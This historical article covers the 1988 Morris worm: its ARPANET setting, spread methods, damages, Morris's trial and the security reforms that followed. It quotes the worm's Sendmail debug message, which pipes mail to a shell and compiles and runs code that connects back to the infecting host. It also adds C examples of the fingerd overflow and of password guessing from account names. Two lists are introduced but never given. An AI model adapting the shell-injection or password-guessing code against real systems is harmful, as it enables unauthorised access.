
Morris worm - it was the first

On November 2, 1988, the ARPANET was attacked by a program that later became known as the "Morris worm", after its creator, Cornell University graduate student Robert Morris Jr. ARPANET (Advanced Research Projects Agency Network) was created in 1969 on the initiative of the Defense Advanced Research Projects Agency (DARPA) and was the prototype of the Internet. It was built for researchers in computing and communications, to exchange messages, programs and data sets between the largest research centers, laboratories, universities, government organizations and private firms doing work for the US Department of Defense (DoD). It was DoD that commissioned the TCP/IP protocol suite, which on January 1, 1983 became the main ARPANET protocol. By the end of the 1980s the network consisted of several tens of thousands of computers. ARPANET ceased to exist in 1990.
The Morris worm was the first example in the history of computing of malicious software that spread automatically over a network. To do so it used several vulnerabilities in network services, as well as weaknesses of the computer systems of the day that stemmed from the insufficient attention then paid to security.

According to Robert Morris, the worm was created for research purposes. Its code carried no "useful" payload (no destructive functions). However, because of mistakes in its algorithms, the worm's spread caused what is now called a denial of service: computers were busy running multiple copies of the worm and stopped responding to operator commands. The Morris worm practically paralyzed computers on the ARPANET for up to five days. Estimates of lost time: at least 8 million hours of downtime and over 1 million hours spent restoring systems. Total losses in monetary terms were estimated at $98 million, made up of direct and indirect losses.
Direct losses ($32 million):
- stopping, testing and rebooting 42,700 machines;
- identifying the worm, deleting it, cleaning memory and restoring 6,200 machines;
- analyzing, disassembling and documenting the worm's code;
- fixing and testing UNIX.
Indirect losses ($66 million):
- loss of computer time because the network was unavailable;
- loss of user access to the network.
These estimates should, however, be treated with great caution.
Structurally, the worm consisted of three parts: a "head" and two "tails". The head was 99 lines of C source text, compiled directly on the remote machine. The tails were binaries identical in source code and algorithm but compiled for different architectures; according to Morris, VAX and Sun were chosen as the target hardware platforms. The head was delivered to a target by the following methods:

Sendmail is the oldest network service for receiving and sending mail over SMTP. At the time the worm spread, Sendmail had an undocumented capability: the developers had built in a debugging mode that should not have been present in the production build and was left in by mistake. One feature of this debug mode was that a recipient could be a program rather than a mailbox, so the message was handed to that program instead of being processed by Sendmail itself. An example of the message sent by the worm:
debug
mail from: </dev/null>
rcpt to: <"| sed -e '1,/^$/d' | /bin/sh; exit 0">
data
cd /usr/tmp
cat > x14481910.c << 'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.c; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As can be seen, sed stripped the headers from the message body (deleting everything up to the first empty line), and the remaining source of the head was saved to a file. The shell was then told to compile the head, run the resulting binary (passing it the address and port of the infecting machine and a magic number), and delete the temporary files.
To exploit the vulnerability in the fingerd service, the worm sent a specially crafted request of 536 bytes. fingerd read the request line with gets() into a 512-byte stack buffer, so the over-long string overwrote the stack frame and eventually caused a call to execve("/bin/sh", 0, 0). This worked only on VAX computers running 4.3BSD; on Sun computers running SunOS the same overflow did not yield a shell (fingerd simply crashed).
To spread via rexec and rsh, the worm collected the list of users of the local machine and, from it, guessed the most likely passwords, hoping that many users had the same login and password on all machines of the network, which, incidentally, was not far from the truth. Besides guessing, rsh offered a trust mechanism, that is, simplified authentication by the address of the remote machine. Trusted hosts were listed in /etc/hosts.equiv and in users' .rhosts files. For most computers the trust was mutual, so with high probability the list of hosts the worm found in these files allowed it to log in to the remote system via rsh without any password at all.
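The fingerd bug described above, as an added example that is not code from the original article or from 4.3BSD: an unbounded line read in the style of gets() next to a bounded one that refuses the request when no line terminator occurs within the buffer. The 512-byte buffer, the 536-byte request and all function names are this example's own constants and assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of fingerd's request buffer (illustration, not the 4.3BSD
 * source). The worm's request was 536 bytes, well past the end of it. */
#define REQ_BUF 512

/* Vulnerable pattern: fingerd did gets(line) into a fixed stack buffer.
 * gets() is gone from C11, so the same unbounded copy is written out: it
 * stops at a newline, never at the end of `line`. Anything longer than
 * REQ_BUF-1 bytes runs past the buffer into the saved frame, which is what
 * the worm's 536-byte request overwrote. Only call this with short input;
 * on long input it is undefined behaviour, by design of the example. */
void finger_request_vulnerable(const char *data, size_t len,
                               char *user, size_t user_cap) {
    char line[REQ_BUF];
    size_t i = 0;
    while (i < len && data[i] != '\n') {
        line[i] = data[i];            /* no check against REQ_BUF */
        i++;
    }
    line[i] = '\0';
    snprintf(user, user_cap, "%s", line);
}

/* Hardened: look for the terminator inside the buffer's capacity first and
 * refuse the request when it is not there. Returns 0 and copies the line
 * (without newline) on success, -1 on empty input, -2 when the line is
 * longer than cap-1 bytes. A line ending at end-of-data without a newline
 * is accepted, as a client closing the connection would produce. */
int read_request_line(const char *data, size_t len, char *buf, size_t cap) {
    if (cap == 0) return -2;
    if (len == 0) return -1;
    size_t limit = len < cap - 1 ? len : cap - 1;
    size_t i = 0;
    while (i < limit && data[i] != '\n') i++;
    if (i == limit && i < len && data[i] != '\n') {
        buf[0] = '\0';
        return -2;                    /* no terminator within capacity */
    }
    memcpy(buf, data, i);
    buf[i] = '\0';
    return 0;
}

/* Same handler as above, built on the bounded reader. Returns the reader's
 * verdict and copies the user name only when the request was accepted. */
int finger_request_safe(const char *data, size_t len,
                        char *user, size_t user_cap) {
    char line[REQ_BUF];
    int rc = read_request_line(data, len, line, sizeof line);
    if (rc == 0)
        snprintf(user, user_cap, "%s", line);
    else if (user_cap > 0)
        user[0] = '\0';
    return rc;
}

int main(void) {
    static char worm_style[537];      /* constructed stand-in for the 536-byte request */
    memset(worm_style, 'A', 536);
    worm_style[536] = '\n';
    char user[64];
    printf("normal request -> %d (%s)\n",
           finger_request_safe("root\n", 5, user, sizeof user), user);
    printf("536-byte request -> %d\n",
           finger_request_safe(worm_style, 537, user, sizeof user));
    return 0;
}
```

The bounded reader accepts a line of up to cap-1 bytes plus its newline and rejects anything longer outright instead of silently truncating, so the rest of an over-long request can never be reinterpreted as a second command.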
When guessing, the worm tried the following password options:
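The password-guessing step of the rsh/rexec spread, as an added example that is not the worm's code or any code from the original article. It derives candidate passwords from an account's own login and GECOS name field and checks them against a passwd-style line. The candidate order (empty, login, login doubled, first name, last name, last name reversed) and the lower-casing of names follow the published analyses of the worm but are this example's assumption; the hash is a toy stand-in for crypt(3) so the code runs without a crypt library, and all function names are invented here.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>

#define NCAND   6
#define CANDLEN 64

/* Stand-in for crypt(3), an assumption of this example: FNV-1a over salt
 * and password, rendered as "salt$hex". The real worm carried its own fast
 * DES implementation to test guesses against the /etc/passwd hashes. */
static void toy_crypt(const char *salt, const char *pw, char *out, size_t cap) {
    uint32_t h = 2166136261u;
    for (const char *p = salt; *p; p++) { h ^= (unsigned char)*p; h *= 16777619u; }
    for (const char *p = pw;   *p; p++) { h ^= (unsigned char)*p; h *= 16777619u; }
    snprintf(out, cap, "%s$%08x", salt, h);
}

/* Build a passwd(5)-style line "login:hash:uid:gid:gecos:home:shell"
 * with the toy hash in the password field (constructed test data). */
void make_entry(const char *login, const char *gecos, const char *pw,
                char *out, size_t cap) {
    char hash[32];
    toy_crypt("ab", pw, hash, sizeof hash);
    snprintf(out, cap, "%s:%s:100:100:%s:/home/%s:/bin/sh", login, hash, gecos, login);
}

static void lower(char *s) { for (; *s; s++) *s = (char)tolower((unsigned char)*s); }

/* Candidates derived from the account itself, tried before any word list:
 * "", login, login+login, first GECOS word, last GECOS word, last reversed.
 * Returns the number of candidates written. */
int user_candidates(const char *login, const char *gecos, char out[NCAND][CANDLEN]) {
    char name[CANDLEN], first[CANDLEN] = "", last[CANDLEN] = "";
    snprintf(name, sizeof name, "%s", gecos);
    char *comma = strchr(name, ',');       /* full name is the part before ',' */
    if (comma) *comma = '\0';
    for (char *tok = strtok(name, " "); tok; tok = strtok(NULL, " ")) {
        if (first[0] == '\0') snprintf(first, sizeof first, "%s", tok);
        snprintf(last, sizeof last, "%s", tok);
    }
    lower(first);
    lower(last);
    int n = 0;
    out[n++][0] = '\0';
    snprintf(out[n++], CANDLEN, "%s", login);
    snprintf(out[n++], CANDLEN, "%s%s", login, login);
    snprintf(out[n++], CANDLEN, "%s", first);
    snprintf(out[n++], CANDLEN, "%s", last);
    size_t len = strlen(last);
    for (size_t i = 0; i < len; i++) out[n][i] = last[len - 1 - i];
    out[n++][len] = '\0';
    return n;
}

/* Try the user-derived candidates against one passwd line. Returns the
 * index of the candidate that matched (copied into `found`) or -1. */
int guess_account(const char *passwd_line, char *found, size_t cap) {
    char line[256], *f[7], *p = line;
    int nf = 0;
    snprintf(line, sizeof line, "%s", passwd_line);
    while (nf < 7) {                       /* split on ':' keeping empty fields */
        f[nf++] = p;
        char *c = strchr(p, ':');
        if (!c) break;
        *c = '\0';
        p = c + 1;
    }
    if (nf < 5) return -1;
    const char *d = strchr(f[1], '$');     /* salt precedes '$' in the toy format */
    char salt[16];
    if (!d || (size_t)(d - f[1]) >= sizeof salt) return -1;
    memcpy(salt, f[1], (size_t)(d - f[1]));
    salt[d - f[1]] = '\0';
    char cand[NCAND][CANDLEN], h[32];
    int n = user_candidates(f[0], f[4], cand);
    for (int k = 0; k < n; k++) {
        toy_crypt(salt, cand[k], h, sizeof h);
        if (strcmp(h, f[1]) == 0) { snprintf(found, cap, "%s", cand[k]); return k; }
    }
    return -1;
}
```

Run against an entry built with make_entry("rtm", "Robert T. Morris", "sirrom", ...), guess_account reports candidate 5 (the reversed last name); against a password unrelated to the account it returns -1, which is where the worm fell back to its built-in word list and then /usr/dict/words.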

The combined use of several propagation methods greatly contributed to the worm's mass spread across the network. To find remote computers, the worm scanned the network using information from the routing table and the infected system's own IP address.
The worm used several techniques to make it harder for administrators to notice it on infected computers:

Despite the "grandeur" of the idea, the worm had errors both in design and in implementation. It was the incorrectly implemented check for whether a system was already infected that led to the worm's mass spread across the network, contrary to its author's intent. In practice, computers were infected many times over, which, first, quickly exhausted their resources and, second, contributed to the avalanche-like spread of the worm through the network. By some estimates, the Morris worm infected about 6,200 computers. The author himself, realizing the scale of what he had done, voluntarily surrendered to the authorities and told everything. The trial of his case ended on January 22, 1990. Initially Morris faced up to five years in prison and a fine of $250,000. In fact the sentence was fairly lenient: the court ordered 400 hours of community service, a fine of $10,050, three years of probation, and payment of the costs of supervising the convict.
The incident with the Morris worm forced IT specialists to think seriously about security. In particular, after it, delays after an incorrectly entered password and the storage of password hashes in /etc/shadow came into use, moving them out of /etc/passwd, which is readable by all users. But the most important consequence was the creation in November 1988 of the CERT Coordination Center (CERT/CC), whose work is devoted to Internet security problems. The first CERT security bulletin, published in December 1988, reported the vulnerabilities exploited by the worm. Notably, many of the techniques used by the Morris worm, such as password brute-forcing, compiling bootstrap code on remote *NIX machines (as Slapper later did), scanning the network for targets, and so on, are still found in modern malware.
Interestingly, in that same year, 1988, the well-known programmer Peter Norton spoke out rather sharply in print against the very existence of computer viruses, calling them a "myth" and comparing the noise around the topic to "stories about crocodiles living in the sewers of New York". Just two years after Norton's statement, in 1990, the first version of the Norton AntiVirus program was released.
And finally: in 1988, under the impression of the Morris worm attack, the American Computer Hardware Association declared November 30 International Computer Security Day, which is still observed today.


Source: https://habr.com/ru/post/160337/
